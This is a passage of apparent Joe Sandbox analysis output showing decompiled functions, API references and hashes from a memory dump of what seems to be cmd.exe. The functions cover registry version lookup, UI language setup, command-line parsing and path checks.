Function 001B4476 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001B4476() {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				long _t17;
				int _t20;

				_t20 = 4;
				_v16 = _t20;
				if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x2000000,  &_v8) != 0) {
					L5:
					return 0;
				}
				_v12 = _t20;
				_t17 = RegQueryValueExW(_v8, L"UBR", 0,  &_v12,  &_v20,  &_v16);
				RegCloseKey(_v8);
				if(_t17 != 0 || _v12 != _t20) {
					goto L5;
				} else {
					return _v20;
				}
			}

0x001b4481
0x001b4485
0x001b44a2
0x001b44e1
0x00000000
0x001b44e1
0x001b44a8
0x001b44be
0x001b44c9
0x001b44d2
0x00000000
0x001b44d9
0x00000000
0x001b44d9

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 001B449A
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 001B44BE
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001B44C9

Strings

Software\Microsoft\Windows NT\CurrentVersion, xrefs: 001B4490
UBR, xrefs: 001B44B6

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
API String ID: 3677997916-3870813718
Opcode ID: 4974f8e31fbad7c02fc5cd88873980fc1b22e8ae9b9cf87cb7bb2b22cd04d492
Instruction ID: c38670959efaa8a78a952f6250d1c5bd2502ba823b5d2992cf64f6f42ad6fe21
Opcode Fuzzy Hash: 4974f8e31fbad7c02fc5cd88873980fc1b22e8ae9b9cf87cb7bb2b22cd04d492
Instruction Fuzzy Hash: 07011976A80218BBDB319B95DC49FFFBBBCEB84710F2441A6EA01A2151E7709A50DA50

Uniqueness

Uniqueness Score: -1.00%

Function 001C465D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E001C465D(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t3;
				int _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t18;
				void* _t19;
				signed int _t20;

				_push(__ecx);
				_t3 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t3 ^ _t20;
				_t18 =  *0x1dd5f8; // 0x0
				if(_t18 != 0) {
					L6:
					 *0x1f94b4(0);
					_t6 =  *_t18();
					L7:
					_pop(_t19);
					return E001C6FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
				}
				_t8 =  *0x1dd0d0; // 0xffffffff
				if(_t8 != 0xffffffff) {
					L3:
					if(_t8 != 0) {
						_t18 = GetProcAddress(_t8, "SetThreadUILanguage");
						 *0x1dd5f8 = _t18;
					}
					L5:
					if(_t18 == 0) {
						_t6 = SetThreadLocale(0x409);
						goto L7;
					}
					goto L6;
				}
				_t8 = GetModuleHandleW(L"KERNEL32.DLL");
				_t18 =  *0x1dd5f8; // 0x0
				 *0x1dd0d0 = _t8;
				if(_t8 == 0xffffffff) {
					goto L5;
				}
				goto L3;
			}

0x001c4662
0x001c4663
0x001c466a
0x001c466e
0x001c4676
0x001c46bd
0x001c46c1
0x001c46c7
0x001c46c9
0x001c46ce
0x001c46d7
0x001c46d7
0x001c4678
0x001c4680
0x001c469d
0x001c469f
0x001c46ad
0x001c46af
0x001c46af
0x001c46b5
0x001c46b7
0x001ce8ad
0x00000000
0x001ce8ad
0x00000000
0x001c46b7
0x001c4687
0x001c468d
0x001c4693
0x001c469b
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,001C4533), ref: 001C4687
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,001C4533), ref: 001C46A7

Strings

KERNEL32.DLL, xrefs: 001C4682
SetThreadUILanguage, xrefs: 001C46A1

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: KERNEL32.DLL$SetThreadUILanguage
API String ID: 1646373207-2530943252
Opcode ID: 784d9d21e92f49c77c14f0510c80487377c22b333d6536e60ec3e6ea17e5472e
Instruction ID: 57ee07756dab7ea9c6e540db8c772843275ef2433b6c546396c1c92005f65f2e
Opcode Fuzzy Hash: 784d9d21e92f49c77c14f0510c80487377c22b333d6536e60ec3e6ea17e5472e
Instruction Fuzzy Hash: DC012B319463209BC710AF38FC08F6D3BA49B65734B05039AF811D7AE0CB30DC818681

Uniqueness

Uniqueness Score: -1.00%

Function 001C1F52 Relevance: 7.8, APIs: 5, Instructions: 293
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E001C1F52(void* __ebx, wchar_t* __ecx, wchar_t* __edx, void* __edi, void* __esi, void* __eflags) {
				wchar_t* _t92;
				void* _t104;
				void* _t108;
				wchar_t* _t110;
				wchar_t** _t111;
				long _t117;
				short* _t118;
				void _t121;
				void* _t123;
				long _t128;
				wchar_t* _t130;
				wchar_t* _t137;
				void* _t146;
				wchar_t** _t155;
				wchar_t** _t158;
				void _t164;
				wchar_t* _t168;
				void _t171;
				intOrPtr _t175;
				long* _t180;
				void* _t188;
				signed int _t191;
				void _t199;
				void* _t203;
				void* _t204;
				wchar_t** _t205;
				long* _t206;
				void* _t207;
				wchar_t* _t209;
				long* _t217;
				void _t218;
				signed int _t220;
				wchar_t* _t223;
				void _t224;
				wchar_t* _t225;
				void* _t226;

				_push(0xc0);
				_push(0x1dbdb8);
				E001C75CC(__ebx, __edi, __esi);
				_t216 = __edx;
				_t223 = __ecx;
				 *(_t226 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t226 - 0xc4)) = __edx;
				_t92 =  *(_t226 + 0xc);
				 *(_t226 - 0xc0) = _t92;
				 *(_t226 - 0xb8) = _t92;
				 *((intOrPtr*)(_t226 - 0xb4)) = 0x90;
				 *((intOrPtr*)(_t226 - 0xb0)) = 5;
				memset(_t226 - 0xac, 0, 0x88);
				 *((intOrPtr*)(_t226 - 0xcc)) = 0;
				_t155 =  *0x1f3cc4;
				_t155[0xc] = 0;
				 *0x1dd0da = 0;
				 *((intOrPtr*)(_t226 - 4)) = 0;
				 *(_t226 - 0xac) =  *(_t226 - 0xc0);
				_push(0x3a);
				if( *0x1f3cc9 == 0) {
					_pop(_t224);
				} else {
					_pop(_t224);
					if( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x38)))) == _t224) {
						 *(_t226 - 0xac) =  *(_t155[0x44]);
					}
				}
				if(E001C7797(_t155) == 0) {
					_t157 = 1;
					goto L5;
				} else {
					 *((intOrPtr*)(_t226 - 0xc8)) = 0;
					_t146 =  *0x1fc010(_t226 - 0xb4, _t226 - 0xcc,  &(( *0x1f3cc4)[0xc]), _t216, _t226 - 0xc8);
					_t157 = 1;
					if(_t146 == 1) {
						__eflags =  *((intOrPtr*)(_t226 - 0xc8)) - 1;
						if( *((intOrPtr*)(_t226 - 0xc8)) == 1) {
							_push(0);
							_push(0x4ec);
							E001BC5A2(1);
							_t157 = 1;
							__eflags = 1;
						}
						 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
						L36:
						return E001C7614(0, _t216, _t224);
					}
					L5:
					 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
					_t199 =  *(_t226 - 0xc0);
					 *0x1dd0da = _t157;
					_t158 =  *0x1f3cc4;
					_t158[2] = 0;
					 *_t158 = _t216;
					_t97 =  *(_t226 + 8);
					_t158[1] =  *(_t226 + 8);
					if( *0x1f3cc9 == 0) {
						L39:
						__eflags = E001C2D22(_t216, _t97, _t199);
						if(__eflags == 0) {
							goto L9;
						}
						goto L49;
					} else {
						_t137 =  *(_t226 - 0xbc);
						_t235 =  *(_t137[0xe]) - _t224;
						if( *(_t137[0xe]) != _t224) {
							_t97 =  *(_t226 + 8);
							goto L39;
						}
						_t225 = _t158[0x44];
						E001C1040(_t216,  *(_t226 + 8),  *_t225);
						( *0x1f3cc4)[2] = _t225[2];
						L9:
						_t216 = 0x2000;
						E001C2A7C(_t226 - 0xc0, 0x2000, _t235);
						_t224 =  *(_t226 - 0xc0);
						if(_t224 == 0) {
							_push(0);
							L48:
							__imp__??_V@YAXPAX@Z();
							L49:
							goto L36;
						}
						E001C1040(_t224, 0x2000, ( *(_t226 - 0xbc))[0xe]);
						_t164 = _t224;
						_t203 = _t164 + 2;
						do {
							_t104 =  *_t164;
							_t164 = _t164 + 2;
						} while (_t104 != 0);
						_t168 = _t224 + ((_t164 - _t203 >> 1) + 1) * 2;
						 *(_t226 - 0xb8) = _t168;
						 *_t168 = 0;
						_t106 =  *(_t226 - 0xbc);
						if(( *(_t226 - 0xbc))[0xf] != 0) {
							_t216 = 0x2000 - (_t168 - _t224 >> 1);
							E001C1040(_t168, 0x2000, _t106[0xf]);
						}
						E001C2A06(( *0x1f3cc4)[3], _t216);
						_t171 = _t224;
						_t204 = _t171 + 2;
						do {
							_t108 =  *_t171;
							_t171 = _t171 + 2;
						} while (_t108 != 0);
						( *0x1f3cc4)[0x19] = _t171 - _t204 >> 1;
						_t110 = E001BDF40(_t224);
						_t205 =  *0x1f3cc4;
						_t205[0xf] = _t110;
						if(_t110 == 0) {
							L50:
							_push(_t224);
							goto L48;
						}
						_t205[0x23] = _t110;
						_t111 =  &(_t205[0x1a]);
						_t175 = 9;
						 *((intOrPtr*)(_t226 - 0xc4)) = _t175;
						do {
							 *((intOrPtr*)(_t111 - 0x28)) = 0;
							 *_t111 = 0;
							_t111 =  &(_t111[1]);
							_t175 = _t175 - 1;
						} while (_t175 != 0);
						_t216 =  *(_t226 - 0xb8);
						if( *_t216 == 0) {
							_t205[0xe] = 0;
							_t205[0xd] = 0;
							L35:
							_t205[4] =  *0x1f3cd8;
							__imp__??_V@YAXPAX@Z(_t224);
							goto L36;
						}
						_t206 = E001BDF40(_t216 + wcsspn(_t216, L" \t") * 2);
						( *0x1f3cc4)[0xd] = _t206;
						if(_t206 == 0) {
							goto L50;
						}
						_t180 = _t206;
						_t56 =  &(_t180[0]); // 0x2
						_t216 = _t56;
						do {
							_t117 =  *_t180;
							_t180 =  &(_t180[0]);
						} while (_t117 != 0);
						_t118 = _t206 + (_t180 - _t216 >> 1) * 2;
						while(_t118 != _t206) {
							_t191 =  *(_t118 - 2) & 0x0000ffff;
							if(_t191 == 0x20 || _t191 ==  *((intOrPtr*)(_t226 - 0xc4))) {
								_t118 = _t118 + 0xfffffffe;
								continue;
							} else {
								break;
							}
						}
						 *_t118 = 0;
						if( *0x1f3cc9 == 0) {
							_t217 = ( *0x1f3cc4)[0xd];
							while(1) {
								_t207 = 0x2f;
								_t216 = E001BD7D4(_t217, _t207);
								 *(_t226 - 0xb8) = _t216;
								__eflags = _t216;
								if(_t216 == 0) {
									goto L28;
								}
								_t217 =  &(_t216[0]);
								_t128 = towupper( *_t217 & 0x0000ffff);
								__eflags = _t128 - 0x51;
								if(_t128 != 0x51) {
									continue;
								}
								 *0x1dd0c8 = 0;
								_t190 =  *(_t226 - 0xb8);
								_t209 =  *(_t226 - 0xb8);
								 *(_t226 - 0xb8) =  &(_t209[0]);
								do {
									_t130 =  *_t209;
									_t209 =  &(_t209[0]);
									__eflags = _t130;
								} while (_t130 != 0);
								_t90 =  &(_t217[0]); // 0x0
								E001C1040(_t190, (_t209 -  *(_t226 - 0xb8) >> 1) + 1, _t90);
								goto L28;
							}
						}
						L28:
						_t121 = E001BEA40(( *0x1f3cc4)[0xd], 0, 0);
						 *(_t226 - 0xc0) = _t121;
						_t205 =  *0x1f3cc4;
						if( *_t121 == 0) {
							L34:
							_t205[0xe] = _t121;
							goto L35;
						}
						_t216 =  &(_t205[0x1a]);
						 *(_t226 - 0xbc) = _t216;
						_t188 = 1;
						while(_t188 < 0xa) {
							 *(_t216 - 0x28) = _t121;
							_t218 = _t121;
							_t66 = _t218 + 2; // 0x2
							 *(_t226 - 0xb8) = _t66;
							do {
								_t123 =  *_t218;
								_t218 = _t218 + 2;
							} while (_t123 != 0);
							_t220 = _t218 -  *(_t226 - 0xb8) >> 1;
							 *( *(_t226 - 0xbc)) = _t220;
							_t121 =  *(_t226 - 0xc0) + _t220 * 2 + 2;
							 *(_t226 - 0xc0) = _t121;
							_t188 = _t188 + 1;
							_t216 =  &(( *(_t226 - 0xbc))[1]);
							 *(_t226 - 0xbc) = _t216;
							if( *_t121 != 0) {
								continue;
							}
							goto L34;
						}
						goto L34;
					}
				}
			}

0x001c1f52
0x001c1f57
0x001c1f5c
0x001c1f61
0x001c1f63
0x001c1f65
0x001c1f6b
0x001c1f71
0x001c1f74
0x001c1f7a
0x001c1f80
0x001c1f8a
0x001c1fa3
0x001c1fab
0x001c1fb1
0x001c1fb7
0x001c1fba
0x001c1fc0
0x001c1fc9
0x001c1fcf
0x001c1fd7
0x001cd476
0x001c1fdd
0x001c1fe0
0x001c1fe4
0x001c1fee
0x001c1fee
0x001c1fe4
0x001c1ffb
0x001cd4a4
0x00000000
0x001c2001
0x001c2001
0x001c2026
0x001c202e
0x001c2031
0x001cd47c
0x001cd482
0x001cd484
0x001cd485
0x001cd48a
0x001cd493
0x001cd493
0x001cd493
0x001cd494
0x001c2281
0x001c2286
0x001c2286
0x001c2037
0x001c2037
0x001c203e
0x001c2044
0x001c204a
0x001c2050
0x001c2053
0x001c2055
0x001c2058
0x001c2062
0x001c2294
0x001c229e
0x001c22a0
0x00000000
0x00000000
0x00000000
0x001c2068
0x001c2068
0x001c2071
0x001c2074
0x001c2291
0x00000000
0x001c2291
0x001c207a
0x001c2087
0x001c2095
0x001c2098
0x001c2098
0x001c20a5
0x001c20aa
0x001c20b2
0x001cd4fa
0x001cd4fb
0x001cd4fb
0x001cd502
0x00000000
0x001cd504
0x001c20c5
0x001c20ca
0x001c20cc
0x001c20cf
0x001c20cf
0x001c20d2
0x001c20d5
0x001c20df
0x001c20e2
0x001c20ea
0x001c20ed
0x001c20f7
0x001c2102
0x001c2106
0x001c2106
0x001c2114
0x001c2119
0x001c211b
0x001c211e
0x001c211e
0x001c2121
0x001c2124
0x001c2132
0x001c2137
0x001c213c
0x001c2142
0x001c2147
0x001cd50c
0x001cd50c
0x00000000
0x001cd50c
0x001c214d
0x001c2153
0x001c2158
0x001c2159
0x001c215f
0x001c215f
0x001c2162
0x001c2164
0x001c2167
0x001c2167
0x001c216c
0x001c2175
0x001c22ab
0x001c22ae
0x001c226f
0x001c2274
0x001c2278
0x00000000
0x001c227f
0x001c2191
0x001c2198
0x001c219d
0x00000000
0x00000000
0x001c21a3
0x001c21a5
0x001c21a5
0x001c21a8
0x001c21a8
0x001c21ab
0x001c21ae
0x001c21b7
0x001c21ba
0x001c21be
0x001c21c5
0x001c2289
0x00000000
0x00000000
0x00000000
0x00000000
0x001c21c5
0x001c21da
0x001c21e3
0x001cd514
0x001cd517
0x001cd519
0x001cd521
0x001cd523
0x001cd529
0x001cd52b
0x00000000
0x00000000
0x001cd531
0x001cd538
0x001cd53f
0x001cd543
0x00000000
0x00000000
0x001cd545
0x001cd54b
0x001cd551
0x001cd556
0x001cd55c
0x001cd55c
0x001cd55f
0x001cd562
0x001cd562
0x001cd56f
0x001cd574
0x00000000
0x001cd574
0x001cd517
0x001c21e9
0x001c21f5
0x001c21fa
0x001c2200
0x001c2209
0x001c226c
0x001c226c
0x00000000
0x001c226c
0x001c220b
0x001c220e
0x001c2216
0x001c2217
0x001c221c
0x001c221f
0x001c2221
0x001c2224
0x001c222a
0x001c222a
0x001c222d
0x001c2230
0x001c223b
0x001c2243
0x001c224e
0x001c2251
0x001c2257
0x001c225e
0x001c2261
0x001c226a
0x00000000
0x00000000
0x00000000
0x001c226a
0x00000000
0x001c2217
0x001c2062

APIs

memset.MSVCRT ref: 001C1FA3
wcsspn.MSVCRT ref: 001C2181
??_V@YAXPAX@Z.MSVCRT ref: 001C2278

Part of subcall function 001C2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2D87
Part of subcall function 001C2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2D91
Part of subcall function 001C2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2DA4
Part of subcall function 001C2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2DAE

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ErrorMode$FullNamePathmemsetwcsspn
String ID:
API String ID: 1535828850-0
Opcode ID: 9fc5cf3959cbc4e8e8899753bbf2ce3f379ca0e2a4e61d5da0745edf3685c48e
Instruction ID: 83973131a8199affb38053645ce652bd43cd1ba4d80c9e515b68469fc2d354c4
Opcode Fuzzy Hash: 9fc5cf3959cbc4e8e8899753bbf2ce3f379ca0e2a4e61d5da0745edf3685c48e
Instruction Fuzzy Hash: 63C16275A00215CFDB69DF28D890FA9B7B6BB64304F1581AEE50A97791DB30DE82CF40

Uniqueness

Uniqueness Score: -1.00%

Function 001C3B5D Relevance: 7.7, APIs: 5, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E001C3B5D(signed short* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				void* _v28;
				void _v548;
				WCHAR* _v552;
				signed int _v556;
				signed short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				int _t46;
				signed int _t52;
				signed short* _t58;
				signed int _t59;
				intOrPtr _t63;
				signed short* _t65;
				void* _t77;
				signed short* _t78;
				void* _t79;
				signed short* _t84;
				signed short** _t87;
				signed int _t88;

				_t82 = __edx;
				_t31 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t31 ^ _t88;
				_v24 = 1;
				_t65 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t84 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L18:
					_t87 = 1;
				} else {
					0xffce = 0x24;
					_t87 = E001C00B0(0xffce);
					if(_t87 == 0) {
						L22:
						E001D9287(0xffce);
						__imp__longjmp(0x1eb8b8, 1);
						goto L23;
					} else {
						 *_t87 = _t84;
						E001BC923(_t87);
						_t84 = _t87[3];
						_v560 = _t87[6];
						_v552 =  *_t87;
						_t63 = E001C00B0(0xffce);
						if(_t63 == 0) {
							goto L22;
						} else {
							 *0x1f3cec = _t63;
							E001C36CB(0, _t63, 0x7fe7, 0);
							_t72 = _v28;
							if(_v28 == 0) {
								L23:
								_t72 =  &_v548;
							}
						}
					}
					_t82 = _v20;
					if(E001C2D22(_t72, _v20, _v552) != 0) {
						goto L18;
					} else {
						_t73 = _v28;
						if(_v28 == 0) {
							_t73 =  &_v548;
						}
						_t46 = 0x5c;
						_t82 = _t46;
						 *((short*)(E001C2349(_t73, _t46) + 2)) = 0;
						_t48 = _v28;
						if(_v28 == 0) {
							_t48 =  &_v548;
						}
						E001C0D89(_t82, _t48);
						if(_t84 == 0) {
							L20:
							E001BC923(_t87);
							_t87[6] = _v560;
						} else {
							_t52 =  *_t84 & 0x0000ffff;
							_t82 = 0x3a;
							if(_t52 == _t82) {
								goto L20;
							} else {
								_t77 = 0x5c;
								if(_t52 == _t77) {
									_t58 = _v552;
									if(_t84 == _t58) {
										L21:
										_t84 =  &(_t84[1]);
									} else {
										while( *_t58 != _t65) {
											_t78 = _t58;
											_t58 =  &(_t58[1]);
											if(_t58 != _t84) {
												continue;
											}
											L13:
											_t59 =  *_t78 & 0x0000ffff;
											if(_t59 == _t82) {
												goto L21;
											} else {
												_t79 = 0x5c;
												if(_t59 == _t79) {
													goto L21;
												}
											}
											goto L15;
										}
										_t78 = _t65;
										goto L13;
									}
								}
								L15:
								_v556 =  *_t84 & 0x0000ffff;
								 *_t84 = 0;
								if(GetFileAttributesW(_v552) == 0xffffffff) {
									_t65 = GetLastError();
								}
								 *0x1f3cf0 = _t65;
								 *_t84 = _v556;
								if( *0x1f3cf0 == 0) {
									goto L20;
								} else {
									goto L18;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E001C6FD0(_t87, _t65, _v8 ^ _t88, _t82, _t84, _t87, _v28);
			}

0x001c3b5d
0x001c3b68
0x001c3b6f
0x001c3b7a
0x001c3b7e
0x001c3b80
0x001c3b8a
0x001c3b8f
0x001c3b91
0x001c3bb7
0x001c3cf0
0x001c3cf2
0x001c3bbd
0x001c3bbf
0x001c3bc5
0x001c3bc9
0x001ce009
0x001ce009
0x001ce015
0x00000000
0x001c3bcf
0x001c3bd1
0x001c3bd3
0x001c3be0
0x001c3be3
0x001c3beb
0x001c3bf1
0x001c3bf8
0x00000000
0x001c3bfe
0x001c3c04
0x001c3c0b
0x001c3c10
0x001c3c15
0x001ce01b
0x001ce01b
0x001ce01b
0x001c3c15
0x001c3bf8
0x001c3c21
0x001c3c2b
0x00000000
0x001c3c31
0x001c3c31
0x001c3c36
0x001ce026
0x001ce026
0x001c3c3e
0x001c3c3f
0x001c3c48
0x001c3c4c
0x001c3c51
0x001ce031
0x001ce031
0x001c3c5d
0x001c3c64
0x001c3d10
0x001c3d12
0x001c3d1d
0x001c3c6a
0x001c3c6a
0x001c3c6f
0x001c3c73
0x00000000
0x001c3c79
0x001c3c7b
0x001c3c7f
0x001c3c81
0x001c3c89
0x001c3d22
0x001c3d22
0x001c3c8f
0x001c3c8f
0x001c3c98
0x001c3c9a
0x001c3c9f
0x00000000
0x00000000
0x001c3ca1
0x001c3ca1
0x001c3ca7
0x00000000
0x001c3ca9
0x001c3cab
0x001c3caf
0x00000000
0x00000000
0x001c3caf
0x00000000
0x001c3ca7
0x001ce03c
0x00000000
0x001ce03c
0x001c3c89
0x001c3cb1
0x001c3cba
0x001c3cc2
0x001c3cce
0x001c3cd6
0x001c3cd6
0x001c3cde
0x001c3ce4
0x001c3cee
0x00000000
0x00000000
0x00000000
0x00000000
0x001c3cee
0x001c3c73
0x001c3c64
0x001c3c2b
0x001c3cf6
0x001c3d0f

APIs

memset.MSVCRT ref: 001C3B91

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

??_V@YAXPAX@Z.MSVCRT ref: 001C3CF6

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

longjmp.MSVCRT(001EB8B8,00000001,-00000001,00000000,?,00000000), ref: 001CE015

Part of subcall function 001BC923: _wcsicmp.MSVCRT ref: 001BC9CF
Part of subcall function 001BC923: _wcsicmp.MSVCRT ref: 001BC9E5
Part of subcall function 001BC923: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 001BCA04
Part of subcall function 001BC923: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001BCA15

Part of subcall function 001C36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,001B590A,00000000), ref: 001C36F0

Part of subcall function 001C2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2D87
Part of subcall function 001C2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2D91
Part of subcall function 001C2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2DA4
Part of subcall function 001C2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2DAE

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,-00000001,00000000,?,00000000), ref: 001C3CC5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001C3CD0

Part of subcall function 001C2349: wcsrchr.MSVCRT ref: 001C234F

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Error$Mode$AttributesFileHeapLast_wcsicmpmemset$AllocCurrentDirectoryFullNamePathProcesslongjmpwcsrchr
String ID:
API String ID: 3402406610-0
Opcode ID: dc642a22f76d6709d132c92158a59a4e89bcaaf0b293633acffe430fc27604e0
Instruction ID: d7315158c4e35d9f9e3b4a89fb348d48c4170f6824fa6de87dfc28e7bf6a6dce
Opcode Fuzzy Hash: dc642a22f76d6709d132c92158a59a4e89bcaaf0b293633acffe430fc27604e0
Instruction Fuzzy Hash: B551C531A002259BCB24EBA49845FBE77F5EF68310F14405EF856E7290DB30CE81DB94

Uniqueness

Uniqueness Score: -1.00%

Function 001BB710 Relevance: 7.6, APIs: 5, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E001BB710(intOrPtr _a4) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1088;
				intOrPtr _v1092;
				void* _v1096;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr _t43;
				int _t46;
				char _t67;
				signed int _t85;

				_t41 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t41 ^ _t85;
				_t43 = _a4;
				_t84 = 0;
				_v1092 = _t43;
				_push(0);
				_push(0x1eb8f8);
				L001C82C1();
				_t67 = 1;
				if(_t43 != 0) {
					 *0x1eb8b0 = 1;
					L12:
					return E001C6FD0(_t67, _t67, _v8 ^ _t85, _t79, 0x104, _t84);
				}
				if( *0x1f3ccc == 0) {
					if( *0x1f8058 != 0) {
						goto L2;
					}
					_t46 = 1;
					if( *0x1f3cc4 == 0) {
						L3:
						_v1088 = _t46;
						_v564 = _t84;
						_v560 = _t67;
						_v556 = 0x104;
						memset( &_v1084, _t84, 0x104);
						_v28 = _t84;
						_v24 = _t67;
						_v20 = 0x104;
						memset( &_v548, _t84, 0x104);
						_t84 = 0x7ee3;
						if(E001C0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0 && E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
							_t63 = _v28;
							if(_v28 == 0) {
								_t63 =  &_v548;
							}
							_t76 = _v564;
							if(_v564 == 0) {
								_t76 =  &_v1084;
							}
							_t79 =  &_v1088;
							_t67 = E001C5FC8(_v1092,  &_v1088, _t76, _v556, _t63, _v20,  &_v1100,  &_v1096);
							if(_t67 == 0) {
								if(_v28 == 0) {
									_t79 =  &_v548;
								}
								_t78 = _v564;
								if(_v564 == 0) {
									_t78 =  &_v1084;
								}
								_t67 = E001BB97C(_t78, _t79, _v1088, _v1100, _v1096);
							}
						}
						 *0x1eb8b0 = _t67;
